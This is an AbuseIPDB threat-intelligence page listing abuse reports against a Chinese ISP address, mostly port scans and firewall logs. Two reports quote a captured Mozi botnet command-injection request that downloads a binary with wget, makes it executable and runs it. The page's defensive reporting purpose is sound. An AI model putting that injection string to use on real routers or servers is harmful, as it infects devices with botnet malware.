JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 61.52.84.197

61.52.84.197 was found in our database!

This IP was reported 33 times. Confidence of Abuse is 0%: ?

ISP	China Unicom Henan province network
Usage Type	Fixed Line ISP
ASN	AS4837
Hostname(s)	hn.kd.dhcp
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Zhengzhou, Henan

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 61.52.84.197

Whois 61.52.84.197

IP Abuse Reports for 61.52.84.197:

This IP address has been reported a total of 33 times from 14 distinct sources. 61.52.84.197 was first reported on December 2nd 2020, and the most recent report was 6 months ago.

Old Reports: The most recent abuse report for this IP address is from 6 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 brantknudson.org	2025-12-08 07:26:51 (6 months ago)	Client sent invalid (non-HTTP) message to honeypot web server: 61.52.84.197 - - [08/Dec/2025:01:26:5 ... show more Client sent invalid (non-HTTP) message to honeypot web server: 61.52.84.197 - - [08/Dec/2025:01:26:50 -0600] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 408 "-" "-" show less	Web App Attack
Anonymous	2025-12-07 14:42:06 (6 months ago)	Unauthorized connection attempt on Port 2323	Port Scan Hacking Exploited Host
🇬🇧 powersec	2025-12-07 14:02:25 (6 months ago)	Malicious Network Traffic. Request: 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%2077 ... show more Malicious Network Traffic. Request: 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 show less	Hacking Bad Web Bot Web App Attack
Anonymous	2025-12-06 10:31:56 (6 months ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇫🇷 sthoyer.de	2025-12-06 08:42:34 (6 months ago)	Dec 6 09:42:33 sthoyer kernel: [IPTables-Block] IN=eth0 OUT= MAC=00:50:56:43:00:af:c0:69:11:cd:10:f ... show more Dec 6 09:42:33 sthoyer kernel: [IPTables-Block] IN=eth0 OUT= MAC=00:50:56:43:00:af:c0:69:11:cd:10:f7:08:00 SRC=61.52.84.197 DST=173.212.223.67 LEN=40 TOS=0x00 PREC=0x00 TTL=45 ID=22421 PROTO=TCP SPT=44681 DPT=23 WINDOW=31747 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇦🇹 centurion	2025-05-13 06:13:50 (1 year ago)	Unauthorized attempt on siem [9093/tcp] Source port: 51363 TTL: 237 Packet length: 44 TOS: 0x00 http ... show more Unauthorized attempt on siem [9093/tcp] Source port: 51363 TTL: 237 Packet length: 44 TOS: 0x00 https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇨🇳 ThreatBook.io	2025-04-04 23:11:15 (1 year ago)	ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/61.52.84.197 2025-04-04 ... show more ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/61.52.84.197 2025-04-04 04:43:39 //www.voanews.com:443 2025-04-04 04:43:40 http://www.minghui.org/ show less	Web App Attack
Anonymous	2025-03-18 14:16:56 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-03-10 12:31:15 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-02-05 22:52:28 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-02-02 14:26:53 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2025-01-11 05:46:01 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇧🇾 StatsMe	2025-01-08 21:15:53 (1 year ago)	2025-01-08T11:40:21.332290+0300 ET SCAN NMAP -sS window 1024	Port Scan
Anonymous	2024-12-13 12:51:19 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
Anonymous	2024-11-24 03:23:43 (1 year ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host

Showing 1 to 15 of 33 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 172.67.165.95

🇨🇳 124.72.224.88

🇳🇱 91.92.40.10

🇮🇳 2a02:4780:12:69a3::1

🇳🇱 193.176.31.253

🇨🇳 183.184.53.191

🇮🇳 182.75.197.174

🇺🇸 165.154.134.203

🇯🇵 152.32.203.18

🇫🇷 85.217.140.4

🇧🇬 79.124.49.194

🇫🇷 51.68.226.87

🇺🇸 20.168.0.45

🇬🇧 5.226.140.83

🇩🇪 213.209.159.56

🇰🇷 211.217.203.165

🇳🇱 195.178.110.30

🇺🇸 104.20.28.246

🇺🇸 66.132.186.168

🇺🇸 47.251.81.121